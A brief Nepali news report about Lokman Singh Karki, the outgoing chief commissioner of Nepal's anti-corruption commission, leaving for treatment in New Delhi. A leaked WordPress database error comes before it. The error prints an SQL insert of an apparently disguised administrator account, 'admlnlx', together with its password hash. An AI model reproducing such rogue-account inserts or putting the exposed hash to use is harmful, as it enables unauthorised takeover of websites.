WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BmpqNTac19rFRRxlje9OjUP4rk2H.H0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-08 02:56:23', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २ –
अख्तियार दुरुपयोग अनुसन्धान आयोगका निवर्तमान प्रमुख आयुक्त लोकमानसिंह कार्की भारतको नयाँ दिल्ली प्रस्थान गरेका छन् ।स्रोतका अनुसार लोकमान स्वाथ्योपचारका लागि पत्नी सुनिता कार्कीलाई लिएर आइतबार बिहान नेपाल एयरलाइन्सको उडानबाट दिल्ली प्रस्थान गरेका हुन् ।
छोरा अभ्युदयमानसिंह कार्कीलाई शुक्रबार क्यानडा पठाएका लोकमान भारतमा उपचार सकेर सिधै क्यानडा जाने कार्यक्रम रहेको स्रोतको भनाई छ ।